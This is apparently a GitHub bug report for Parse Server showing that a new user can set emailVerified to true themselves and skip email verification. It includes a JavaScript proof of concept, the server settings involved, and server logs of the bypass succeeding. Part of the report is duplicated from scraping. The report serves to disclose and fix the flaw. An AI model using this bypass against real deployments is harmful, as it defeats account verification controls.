You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
User who has just signed up, can set emailVerified=true without actually verifying the email address. In other words, user does not have to click the link in the email to get his/her email validated.
Steps to reproduce
Steps that reproduce the issue:
Set the following settings in the server.js:
verifyUserEmails: true,
emailVerifyTokenValidityDuration: 2 * 60 * 60,
preventLoginWithUnverifiedEmail: true,
signup, set emailVerified: true and save user. Here is sample html page that does just that:
var user = new Parse.User();
user.set("username", "hacker");
user.set("password", "passwd");
user.set("email", "hacker@example.com");
user.signUp(null, {
success: function(user) {
// Signup succeeded
alert("Signup succeeded");
// Try hack emailVerified to true (should not succeed)
user.set("emailVerified",true);
user.save(null, {
success : function(userAgain) {
// Execute any logic that should take place after the object is saved.
alert('Save succeeded');
},
error : function(userAgain, error) {
alert('Save failed with '+error.message);
}
});
},
error: function(user, error) {
// Show the error message somewhere and let the user try again.
alert("Error: " + error.code + "\n\nwhat is the error \n\n " + error.message);
}
});
User who has just signed up, can set emailVerified=true without actually verifying the email address. In other words, user does not have to click the link in the email to get his/her email validated.
Steps to reproduce
Steps that reproduce the issue:
Set the following settings in the server.js:
verifyUserEmails: true,
emailVerifyTokenValidityDuration: 2 * 60 * 60,
preventLoginWithUnverifiedEmail: true,
signup, set emailVerified: true and save user. Here is sample html page that does just that:
<html>
<head>
<script type="text/javascript" src="https://npmcdn.com/parse/dist/parse.js"\>\</script>
<script type="text/javascript">
function signupAndSetEmailVerified()
{
Parse.initialize('e5c10b31d8716509af3e571260');
Parse.serverURL = 'http://127.0.0.1:8888/parse';
}
</script>
</head>
<body onload="signupAndSetEmailVerified()">
</body>
</html>
Expected Results
Save should fail or at least emailVerified should still be false in the database for this user.
Actual Outcome
emailVerified is true in the database for this new user.
Environment Setup
Server
Database
Logs/Trace
�[36mverbose�[39m: REQUEST for [POST] /parse/users: {
"username": "hacker",
"password": "",
"email": "hacker@example.com"
} method=POST, url=/parse/users, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=214, username=hacker, password=, email=hacker@example.com
�[36mverbose�[39m: RESPONSE from [POST] /parse/users: {
"status": 201,
"response": {
"objectId": "cyl7z1XcSe",
"createdAt": "2017-01-18T12:16:05.861Z",
"sessionToken": "r:c54acc4bbcf051b306c7d0f8d4982646"
},
"location": "http://127.0.0.1:8888/parse/users/cyl7z1XcSe"
} status=201, objectId=cyl7z1XcSe, createdAt=2017-01-18T12:16:05.861Z, sessionToken=r:c54acc4bbcf051b306c7d0f8d4982646, location=http://127.0.0.1:8888/parse/users/cyl7z1XcSe
�[36mverbose�[39m: REQUEST for [PUT] /parse/classes/_User/cyl7z1XcSe: {
"emailVerified": true
} method=PUT, url=/parse/classes/_User/cyl7z1XcSe, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=235, emailVerified=true
�[36mverbose�[39m: RESPONSE from [PUT] /parse/classes/_User/cyl7z1XcSe: {
"response": {
"updatedAt": "2017-01-18T12:16:06.833Z"
}
} updatedAt=2017-01-18T12:16:06.833Z
The text was updated successfully, but these errors were encountered: